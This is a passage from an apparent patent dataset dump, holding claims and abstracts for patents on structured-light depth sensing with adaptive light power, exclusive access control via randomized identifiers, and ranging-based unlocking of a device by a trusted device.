ascertaining depth information for the scene in the captured image based on the code mask. 13. The method of claim 11, further comprising:
fixing the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 14. The method of claim 11, further comprising:
maintaining an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 15. The method of claim 11, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 16. The method of claim 11, wherein the projecting light source includes a plurality of light elements, and dynamically adjusting the light source power for the projecting light source includes individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 17. The method of claim 16, further comprising:
capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 18. The method of claim 11, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further comprising:
individually controlling the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 19. The method of claim 18, further comprising:
controlling the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 20. The method of claim 18, further comprising:
capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 21. A device adapted to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
means for capturing, at a receiver sensor, an image of a scene onto which a code mask is projected; means for ascertaining, at a processing circuit, one or more parameters from the captured image; and means for dynamically adjusting a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 22. The device of claim 21, further comprising:
means for ascertaining depth information for the scene in the captured image based on the code mask. 23. The device of claim 21, further comprising:
means for fixing the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 24. The device of claim 21, further comprising:
means for maintaining an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 25. The device of claim 21, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 26. The device of claim 21, wherein the projecting light source includes a plurality of light elements, and the means for dynamically adjusting the light source power for the projecting light source includes means for individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 27. The device of claim 26, further comprising:
means for capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 28. The device of claim 21, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further comprising:
means for individually controlling the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 29. The device of claim 28, further comprising:
means for controlling the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 30. The method of claim 28, further comprising:
means for capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 31. A processor-readable storage medium having one or more instructions compensate for differences in surface reflectivity in an active depth sensing system using structured light, which when executed by one or more processors causes the one or more processors to:
capture, at a receiver sensor, an image of a scene onto which a code mask is projected; ascertain one or more parameters from the captured image; and dynamically adjust a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 32. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
ascertain depth information for the scene in the captured image based on the code mask. 33. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
fix the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 34. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
maintain an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 35. The processor-readable storage medium of claim 31, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 36. The processor-readable storage medium of claim 31, wherein the projecting light source includes a plurality of light elements, and further having one or more instructions which when executed by one or more processors causes the one or more processors to:
dynamically adjust the light source power for the projecting light source includes individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 37. The processor-readable storage medium of claim 36 having one or more instructions which when executed by one or more processors causes the one or more processors to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 38. The processor-readable storage medium of claim 36, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further having one or more instructions which when executed by one or more processors causes the one or more processors to:
individually control the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 39. The processor-readable storage medium of claim 38 having one or more instructions which when executed by one or more processors causes the one or more processors to:
control the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 40. The processor-readable storage medium of claim 36 having one or more instructions which when executed by one or more processors causes the one or more processors to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. | A method and device is provided that compensates for different reflectivity/absorption coefficients of objects in a scene/object when performing active depth sensing using structured light. A receiver sensor captures an image of a scene onto which a code mask is projected. One or more parameters are ascertained from the captured image. Then a light source power for a projecting light source is dynamically adjusted according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. Depth information for the scene may then be ascertained based on the captured image based on the code mask. In one example, the light source power is fixed at a particular illumination while an exposure time for the receiver sensor is adjusted. In another example, an exposure time for the receiver sensor is maintained/kept at a fixed value while the light source power is adjusted.1. A device adapted to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
a receiver sensor for capturing an image of a scene onto which a code mask is projected; a processing circuit adapted to:
ascertain one or more parameters from the captured image; and
dynamically adjust a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 2. The device of claim 1, wherein the processing circuit is further adapted to:
ascertain depth information for the scene in the captured image based on the code mask. 3. The device of claim 1, wherein the processing circuit is further adapted to:
fix the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 4. The device of claim 1, wherein the processing circuit is further adapted to:
maintain an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 5. The device of claim 1, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 6. The device of claim 1, wherein the projecting light source includes a plurality of light elements, and dynamically adjusting the light source power for the projecting light source includes individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 7. The device of claim 6, wherein the receiver sensor is further adapted to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 8. The device of claim 1, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and the processing circuit is further adapted to individually control the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 9. The device of claim 8, wherein the sensor shutters are controlled to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 10. The device of claim 8, wherein the receiver sensor is further adapted to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 11. A method to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
capturing, at a receiver sensor, an image of a scene onto which a code mask is projected; ascertaining, at a processing circuit, one or more parameters from the captured image; and dynamically adjusting a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 12. The method of claim 11, further comprising:
ascertaining depth information for the scene in the captured image based on the code mask. 13. The method of claim 11, further comprising:
fixing the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 14. The method of claim 11, further comprising:
maintaining an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 15. The method of claim 11, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 16. The method of claim 11, wherein the projecting light source includes a plurality of light elements, and dynamically adjusting the light source power for the projecting light source includes individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 17. The method of claim 16, further comprising:
capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 18. The method of claim 11, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further comprising:
individually controlling the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 19. The method of claim 18, further comprising:
controlling the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 20. The method of claim 18, further comprising:
capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 21. A device adapted to compensate for differences in surface reflectivity in an active depth sensing system using structured light, comprising:
means for capturing, at a receiver sensor, an image of a scene onto which a code mask is projected; means for ascertaining, at a processing circuit, one or more parameters from the captured image; and means for dynamically adjusting a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 22. The device of claim 21, further comprising:
means for ascertaining depth information for the scene in the captured image based on the code mask. 23. The device of claim 21, further comprising:
means for fixing the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 24. The device of claim 21, further comprising:
means for maintaining an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 25. The device of claim 21, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 26. The device of claim 21, wherein the projecting light source includes a plurality of light elements, and the means for dynamically adjusting the light source power for the projecting light source includes means for individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 27. The device of claim 26, further comprising:
means for capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 28. The device of claim 21, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further comprising:
means for individually controlling the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 29. The device of claim 28, further comprising:
means for controlling the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 30. The method of claim 28, further comprising:
means for capturing a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. 31. A processor-readable storage medium having one or more instructions compensate for differences in surface reflectivity in an active depth sensing system using structured light, which when executed by one or more processors causes the one or more processors to:
capture, at a receiver sensor, an image of a scene onto which a code mask is projected; ascertain one or more parameters from the captured image; and dynamically adjust a light source power for a projecting light source according to the one or more parameters to improve decoding of the code mask in a subsequently captured image. 32. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
ascertain depth information for the scene in the captured image based on the code mask. 33. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
fix the light source power at a particular illumination while an exposure time for the receiver sensor is adjusted. 34. The processor-readable storage medium of claim 31 having one or more instructions which when executed by one or more processors causes the one or more processors to:
maintain an exposure time for the receiver sensor at a fixed value while the light source power is adjusted. 35. The processor-readable storage medium of claim 31, wherein the one or more parameters are correlated to regions within the captured image based on the code mask. 36. The processor-readable storage medium of claim 31, wherein the projecting light source includes a plurality of light elements, and further having one or more instructions which when executed by one or more processors causes the one or more processors to:
dynamically adjust the light source power for the projecting light source includes individually controlling the light source power for each of the light elements based on the corresponding one or more parameters. 37. The processor-readable storage medium of claim 36 having one or more instructions which when executed by one or more processors causes the one or more processors to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of light elements. 38. The processor-readable storage medium of claim 36, wherein the receiver sensor includes a plurality of individually controlled sensor shutters, and further having one or more instructions which when executed by one or more processors causes the one or more processors to:
individually control the plurality sensor shutters based on the corresponding one or more parameters to adjust the light captured by the receiver sensor. 39. The processor-readable storage medium of claim 38 having one or more instructions which when executed by one or more processors causes the one or more processors to:
control the sensor shutters to either reduce or increase the light that passes through them to compensate for too much or too little light in a given region as indicated by the one or more parameters. 40. The processor-readable storage medium of claim 36 having one or more instructions which when executed by one or more processors causes the one or more processors to:
capture a new image of the scene onto which the code mask is projected, wherein the new image is light compensated on a region-by-region basis due to the operation of the individually adjusted plurality of sensor shutters. | 2,400 |
9,132 | 9,132 | 15,122,268 | 2,438 | There is provided an information processing device, information processing method, and program that enable access from each of a plurality of access sources to be exclusively controlled even in a communication environment based on a standard in which one-to-one communication is assumed, the information processing device including: an acquisition unit configured to acquire identification information at least a part of which includes randomized information from an external device; and a control unit configured to set only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. | 1. An information processing device comprising:
an acquisition unit configured to acquire identification information at least a part of which includes randomized information from an external device; and a control unit configured to set only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 2. The information processing device according to claim 1, wherein, based on an instruction from the external device that is an acquisition source of the identification information, the control unit terminates exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively. 3. The information processing device according to claim 2, wherein the control unit continues the exclusive control when control information indicating continuation of the exclusive control is associated with the communication data associated with the identification information. 4. The information processing device according to claim 1, wherein, when a period in which the communication data associated with the acquired identification information is not received from the external device is equal to or longer than a period decided in advance, the control unit terminates exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively. 5. The information processing device according to claim 1, wherein, after completion of a process based on the communication data associated with the acquired identification information, the control unit terminates exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively. 6. The information processing device according to claim 1, wherein, after completion of exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively, the control unit discards the identification information. 7. The information processing device according to claim 1, wherein, based on an instruction from the external device that is an acquisition source of the identification information, the control unit starts exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively. 8. The information processing device according to claim 1, wherein, when communication data that is not associated with the identification information is acquired during exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively, the control unit discards the communication data that is not associated with the identification information. 9. The information processing device according to claim 1, wherein, when other identification information that is different from the identification information is acquired during exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively, the control unit discards the other identification information. 10. The information processing device according to claim 1, wherein
the acquisition unit acquires second identification information that is different from first identification information acquired from the external device as the identification information, and the control unit transmits a result of a process based on the communication data associated with the first identification information to the external device in association with the second identification information. 11. The information processing device according to claim 10, comprising:
a generation unit configured to generate the second identification information based on the first identification information, wherein the acquisition unit acquires the second identification information generated by the generation unit. 12. The information processing device according to claim 10, wherein the acquisition unit acquires the second identification information from the external device that is an acquisition source of the first identification information. 13. The information processing device according to claim 10, wherein, when communication data that is not associated with other first identification information that is different from the first identification information is acquired during exclusive control in which only the communication data associated with the acquired first identification information is set as a processing target exclusively, the control unit notifies the external device that is a transmission source of the communication data of information indicating that the communication data is not set as a processing target in association with the second identification information corresponding to the other first identification information. 14. The information processing device according to claim 1, wherein
the acquisition unit acquires authentication information associated with the identification information from the external device, and when authentication succeeds based on the authentication information, the control unit recognizes a transmission source of the communication data associated with the identification information as a transmission source for which authentication has been performed. 15. The information processing device according to claim 1, wherein
the acquisition unit acquires each of data fragments obtained by dividing the communication data associated with the identification information into the data fragments, and the control unit continues exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively until at least acquisition of the series of data fragments is completed. 16. The information processing device according to claim 15, wherein the control unit recognizes the completion of the acquisition of the series of data fragments based on control information for identifying the data fragments associated with the data fragments. 17. The information processing device according to claim 15, wherein
the acquisition unit acquires control information for identifying the communication data associated with the data fragments, and the control unit recognizes that the data fragments are data fragments constituting the communication data based on the acquired control information for identifying the communication data. 18. The information processing device according to claim 1, comprising:
an informing unit configured to perform informing of a process result based on the communication data associated with the acquired identification information. 19. An information processing device comprising:
a generation unit configured to generate identification information at least a part of which includes randomized information; and a control unit configured to notify an external device of the generated identification information, and transmit communication data to the external device by associating the identification information with the communication data. 20. The information processing device according to claim 19, wherein
based on first identification information generated as the identification information, the generation unit generates second identification information that is different from the first identification information, and the control unit notifies the external device of the generated first identification information, transmits the communication data to the external device by associating the first identification information with the communication data, and sets only a response associated with the second identification information out of responses transmitted from the external device as a processing target. 21. The information processing device according to claim 19, wherein
the generation unit generates first identification information and second identification information that are different from each other as the identification information, and the control unit notifies the external device of the generated first identification information and second identification information, transmits the communication data to the external device by associating the first identification information with the communication data, and sets only a response associated with the second identification information out of responses transmitted from the external device as a processing target. 22. An information processing method comprising:
acquiring identification information at least a part of which includes randomized information from an external device; and setting, by a processor, only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 23. An information processing method comprising:
generating identification information at least a part of which includes randomized information; and notifying, by a processor, an external device of the generated identification information, and transmitting communication data to the external device by associating the identification information with the communication data. 24. A program causing a computer to execute:
acquiring identification information at least a part of which includes randomized information from an external device; and setting only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 25. A program causing a computer to execute:
generating identification information at least a part of which includes randomized information; and notifying an external device of the generated identification information, and transmitting communication data to the external device by associating the identification information with the communication data. | There is provided an information processing device, information processing method, and program that enable access from each of a plurality of access sources to be exclusively controlled even in a communication environment based on a standard in which one-to-one communication is assumed, the information processing device including: an acquisition unit configured to acquire identification information at least a part of which includes randomized information from an external device; and a control unit configured to set only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively.1. An information processing device comprising:
an acquisition unit configured to acquire identification information at least a part of which includes randomized information from an external device; and a control unit configured to set only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 2. The information processing device according to claim 1, wherein, based on an instruction from the external device that is an acquisition source of the identification information, the control unit terminates exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively. 3. The information processing device according to claim 2, wherein the control unit continues the exclusive control when control information indicating continuation of the exclusive control is associated with the communication data associated with the identification information. 4. The information processing device according to claim 1, wherein, when a period in which the communication data associated with the acquired identification information is not received from the external device is equal to or longer than a period decided in advance, the control unit terminates exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively. 5. The information processing device according to claim 1, wherein, after completion of a process based on the communication data associated with the acquired identification information, the control unit terminates exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively. 6. The information processing device according to claim 1, wherein, after completion of exclusive control in which only the communication data associated with the identification information is set as a processing target exclusively, the control unit discards the identification information. 7. The information processing device according to claim 1, wherein, based on an instruction from the external device that is an acquisition source of the identification information, the control unit starts exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively. 8. The information processing device according to claim 1, wherein, when communication data that is not associated with the identification information is acquired during exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively, the control unit discards the communication data that is not associated with the identification information. 9. The information processing device according to claim 1, wherein, when other identification information that is different from the identification information is acquired during exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively, the control unit discards the other identification information. 10. The information processing device according to claim 1, wherein
the acquisition unit acquires second identification information that is different from first identification information acquired from the external device as the identification information, and the control unit transmits a result of a process based on the communication data associated with the first identification information to the external device in association with the second identification information. 11. The information processing device according to claim 10, comprising:
a generation unit configured to generate the second identification information based on the first identification information, wherein the acquisition unit acquires the second identification information generated by the generation unit. 12. The information processing device according to claim 10, wherein the acquisition unit acquires the second identification information from the external device that is an acquisition source of the first identification information. 13. The information processing device according to claim 10, wherein, when communication data that is not associated with other first identification information that is different from the first identification information is acquired during exclusive control in which only the communication data associated with the acquired first identification information is set as a processing target exclusively, the control unit notifies the external device that is a transmission source of the communication data of information indicating that the communication data is not set as a processing target in association with the second identification information corresponding to the other first identification information. 14. The information processing device according to claim 1, wherein
the acquisition unit acquires authentication information associated with the identification information from the external device, and when authentication succeeds based on the authentication information, the control unit recognizes a transmission source of the communication data associated with the identification information as a transmission source for which authentication has been performed. 15. The information processing device according to claim 1, wherein
the acquisition unit acquires each of data fragments obtained by dividing the communication data associated with the identification information into the data fragments, and the control unit continues exclusive control in which only the communication data associated with the acquired identification information is set as a processing target exclusively until at least acquisition of the series of data fragments is completed. 16. The information processing device according to claim 15, wherein the control unit recognizes the completion of the acquisition of the series of data fragments based on control information for identifying the data fragments associated with the data fragments. 17. The information processing device according to claim 15, wherein
the acquisition unit acquires control information for identifying the communication data associated with the data fragments, and the control unit recognizes that the data fragments are data fragments constituting the communication data based on the acquired control information for identifying the communication data. 18. The information processing device according to claim 1, comprising:
an informing unit configured to perform informing of a process result based on the communication data associated with the acquired identification information. 19. An information processing device comprising:
a generation unit configured to generate identification information at least a part of which includes randomized information; and a control unit configured to notify an external device of the generated identification information, and transmit communication data to the external device by associating the identification information with the communication data. 20. The information processing device according to claim 19, wherein
based on first identification information generated as the identification information, the generation unit generates second identification information that is different from the first identification information, and the control unit notifies the external device of the generated first identification information, transmits the communication data to the external device by associating the first identification information with the communication data, and sets only a response associated with the second identification information out of responses transmitted from the external device as a processing target. 21. The information processing device according to claim 19, wherein
the generation unit generates first identification information and second identification information that are different from each other as the identification information, and the control unit notifies the external device of the generated first identification information and second identification information, transmits the communication data to the external device by associating the first identification information with the communication data, and sets only a response associated with the second identification information out of responses transmitted from the external device as a processing target. 22. An information processing method comprising:
acquiring identification information at least a part of which includes randomized information from an external device; and setting, by a processor, only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 23. An information processing method comprising:
generating identification information at least a part of which includes randomized information; and notifying, by a processor, an external device of the generated identification information, and transmitting communication data to the external device by associating the identification information with the communication data. 24. A program causing a computer to execute:
acquiring identification information at least a part of which includes randomized information from an external device; and setting only communication data associated with the acquired identification information out of communication data transmitted from the external device as a processing target exclusively. 25. A program causing a computer to execute:
generating identification information at least a part of which includes randomized information; and notifying an external device of the generated identification information, and transmitting communication data to the external device by associating the identification information with the communication data. | 2,400 |
9,133 | 9,133 | 15,275,203 | 2,436 | Some embodiments of the invention provide a method for a trusted (or originator) device to modify the security state of a target device (e.g., unlocking the device) based on a securing ranging operation (e.g., determining a distance, proximity, etc.). The method of some embodiments exchanges messages as a part of a ranging operation in order to determine whether the trusted and target devices are within a specified range of each other before allowing the trusted device to modify the security state of the target device. In some embodiments, the messages are derived by both devices based on a shared secret and are used to verify the source of ranging signals used for the ranging operation. In some embodiments, the method is performed using multiple different frequency bands. | 1. A method for a first device to modify a security state at a second device, the method comprising:
performing a plurality of ranging operations to compute a plurality of sample distance measurements between the first and second devices; determining whether the plurality of sample distance measurements meets a set of criteria; and when the calculated composite distance measurement meets the set of criteria, exchanging a security token with the second device to modify the security state at the second device. 2. The method of claim 1, wherein modifying the security state comprises putting the second device into an unlocked state from a locked state. 3. The method of claim 1, wherein modifying the security state comprises authorizing a set of restricted operations to be performed at the second device. 4. The method of claim 1, wherein performing a ranging operation of the plurality of ranging operations comprises:
exchanging codes between the first and second devices; identifying timestamps for the sending and receiving of the codes; and computing a sample distance measurement from the identified timestamps. 5. The method of claim 1 further comprising receiving, from the second device, a request to modify the security state at the second device. 6. The method of claim 5, wherein the second device sends the request upon receiving a user input at the second device. 7. The method of claim 5, wherein the second device sends the request upon detecting that the first device is within a particular distance of the second device. 8. The method of claim 1 further comprising determining that the first device should exchange the security token with the second device when the first device is in an unlocked mode. 9. The method of claim 1 further comprising determining that the first device should exchange the security token with the second device upon receiving a user input at the first device. 10. The method of claim 1, wherein determining whether the plurality of sample distance measurements meets the set of criteria comprises:
calculating, based on the plurality of sample distance measurements, a confidence level that the first device is within a threshold distance of the second device; and determining that the plurality of sample distance measurements meets the set of criteria when the confidence level exceeds a threshold value. 11. The method of claim 1, wherein determining whether the plurality of sample distance measurements meets the set of criteria comprises:
calculating a composite distance measurement based on the plurality of sample distance measurements; and determining that the plurality of sample distance measurements meets the set of criteria when the composite distance measurement is within a threshold distance. 12. The method of claim 1, wherein the first device is established as a trusted device through an authorization process with the second device, wherein the first device receives the security token from the second device during the authorization process. 13. The method of claim 1 further comprising establishing a first channel and a different second channel between the first and second devices, wherein the security token is exchanged over the first channel and the plurality of ranging operations are performed over the second channel. 14. The method of claim 13, wherein the first channel is encrypted with a first key and the second channel is encrypted with a different, second key. 15. The method of claim 14, wherein the second key is derived from the first key. 16. The method of claim 13, wherein the first channel uses a first wireless protocol and the second channel uses a different, second wireless protocol. 17. The method of claim 16, wherein the first wireless protocol is a Bluetooth protocol and the second wireless protocol is a Wi-Fi protocol. 18. For a proxy device, a method for establishing a communication connection between a target device and a trusted device, the method comprising:
announcing an availability of the trusted device; in response to the announced availability, receiving a first request from the target device; and upon receiving the first request from the target device, sending a second request to the trusted device, wherein the trusted device establishes the communication connection based on the second request. 19. The method of claim 18, wherein the communication connection between the target device and the trusted device is for exchanging ranging information to determine whether the target device and the trusted device are within a particular range prior to exchanging authorization information to modify a security state of the target device. 20. The method of claim 18, wherein the proxy device announces the availability of the trusted device using a first wireless protocol and the communication connection established between the target device and the trusted device uses a different, second wireless protocol. 21. The method of claim 20, wherein the second request to the trusted device comprises a request for the trusted device to announce its availability to the target device. 22. The method of claim 20, wherein the proxy device maintains a connection with the trusted device using the first wireless protocol. 23. The method of claim 18, wherein announcing the availability comprises broadcasting an identifier for the target device. 24. A non-transitory machine readable medium storing a program which when executed by a set of processing units of a target device establishes a communication connection between the target device and a trusted device, the program comprising sets of instructions for:
scanning for availability of a trusted device; based on the scan, identifying a particular trusted device; sending a request for the particular trusted device to a proxy device that sends a request to the particular trusted device; and establishing a communication connection with the particular trusted device. 25. The non-transitory machine readable medium of claim 24, wherein the sets of instructions for scanning, sending, and exchanging are performed using a first wireless protocol, wherein the communication connection is established to use a different, second wireless protocol. 26. The non-transitory machine readable medium of claim 24, wherein upon receiving the request, the proxy device instructs the particular trusted device to initiate a broadcast of its availability. 27. The non-transitory machine readable medium of claim 24, wherein the proxy device is in a locked state and the trusted device is in an unlocked state. 28. The non-transitory machine readable medium of claim 24, wherein the set of instructions for establishing the communication connection comprises a set of instructions for exchanging bootstrap information with the particular trusted device, wherein the bootstrap information identifies a portion of a frequency spectrum for the communication connection. 29. The non-transitory machine readable medium of claim 24, wherein the program further comprises sets of instructions for:
receiving input to initiate a change in security state at the target device; using the established communication connection to perform a set of ranging operations to allow the target device to receive a set of authentication information; and using the set of authentication information to change the security state at the target device. 30. The non-transitory machine readable medium of claim 29, wherein the change in security state moves the target device from a locked state to an unlocked state. 31. The non-transitory machine readable medium of claim 24, wherein the target device is allowed to receive the set of authentication information when the trusted device is determined to be within a particular threshold distance based on the set of ranging operations. 32. The non-transitory machine readable medium of claim 24, wherein the trusted device sends the set of authentication information when the target device is determined to be within a particular threshold distance based on the set of ranging operations. | Some embodiments of the invention provide a method for a trusted (or originator) device to modify the security state of a target device (e.g., unlocking the device) based on a securing ranging operation (e.g., determining a distance, proximity, etc.). The method of some embodiments exchanges messages as a part of a ranging operation in order to determine whether the trusted and target devices are within a specified range of each other before allowing the trusted device to modify the security state of the target device. In some embodiments, the messages are derived by both devices based on a shared secret and are used to verify the source of ranging signals used for the ranging operation. In some embodiments, the method is performed using multiple different frequency bands.1. A method for a first device to modify a security state at a second device, the method comprising:
performing a plurality of ranging operations to compute a plurality of sample distance measurements between the first and second devices; determining whether the plurality of sample distance measurements meets a set of criteria; and when the calculated composite distance measurement meets the set of criteria, exchanging a security token with the second device to modify the security state at the second device. 2. The method of claim 1, wherein modifying the security state comprises putting the second device into an unlocked state from a locked state. 3. The method of claim 1, wherein modifying the security state comprises authorizing a set of restricted operations to be performed at the second device. 4. The method of claim 1, wherein performing a ranging operation of the plurality of ranging operations comprises:
exchanging codes between the first and second devices; identifying timestamps for the sending and receiving of the codes; and computing a sample distance measurement from the identified timestamps. 5. The method of claim 1 further comprising receiving, from the second device, a request to modify the security state at the second device. 6. The method of claim 5, wherein the second device sends the request upon receiving a user input at the second device. 7. The method of claim 5, wherein the second device sends the request upon detecting that the first device is within a particular distance of the second device. 8. The method of claim 1 further comprising determining that the first device should exchange the security token with the second device when the first device is in an unlocked mode. 9. The method of claim 1 further comprising determining that the first device should exchange the security token with the second device upon receiving a user input at the first device. 10. The method of claim 1, wherein determining whether the plurality of sample distance measurements meets the set of criteria comprises:
calculating, based on the plurality of sample distance measurements, a confidence level that the first device is within a threshold distance of the second device; and determining that the plurality of sample distance measurements meets the set of criteria when the confidence level exceeds a threshold value. 11. The method of claim 1, wherein determining whether the plurality of sample distance measurements meets the set of criteria comprises:
calculating a composite distance measurement based on the plurality of sample distance measurements; and determining that the plurality of sample distance measurements meets the set of criteria when the composite distance measurement is within a threshold distance. 12. The method of claim 1, wherein the first device is established as a trusted device through an authorization process with the second device, wherein the first device receives the security token from the second device during the authorization process. 13. The method of claim 1 further comprising establishing a first channel and a different second channel between the first and second devices, wherein the security token is exchanged over the first channel and the plurality of ranging operations are performed over the second channel. 14. The method of claim 13, wherein the first channel is encrypted with a first key and the second channel is encrypted with a different, second key. 15. The method of claim 14, wherein the second key is derived from the first key. 16. The method of claim 13, wherein the first channel uses a first wireless protocol and the second channel uses a different, second wireless protocol. 17. The method of claim 16, wherein the first wireless protocol is a Bluetooth protocol and the second wireless protocol is a Wi-Fi protocol. 18. For a proxy device, a method for establishing a communication connection between a target device and a trusted device, the method comprising:
announcing an availability of the trusted device; in response to the announced availability, receiving a first request from the target device; and upon receiving the first request from the target device, sending a second request to the trusted device, wherein the trusted device establishes the communication connection based on the second request. 19. The method of claim 18, wherein the communication connection between the target device and the trusted device is for exchanging ranging information to determine whether the target device and the trusted device are within a particular range prior to exchanging authorization information to modify a security state of the target device. 20. The method of claim 18, wherein the proxy device announces the availability of the trusted device using a first wireless protocol and the communication connection established between the target device and the trusted device uses a different, second wireless protocol. 21. The method of claim 20, wherein the second request to the trusted device comprises a request for the trusted device to announce its availability to the target device. 22. The method of claim 20, wherein the proxy device maintains a connection with the trusted device using the first wireless protocol. 23. The method of claim 18, wherein announcing the availability comprises broadcasting an identifier for the target device. 24. A non-transitory machine readable medium storing a program which when executed by a set of processing units of a target device establishes a communication connection between the target device and a trusted device, the program comprising sets of instructions for:
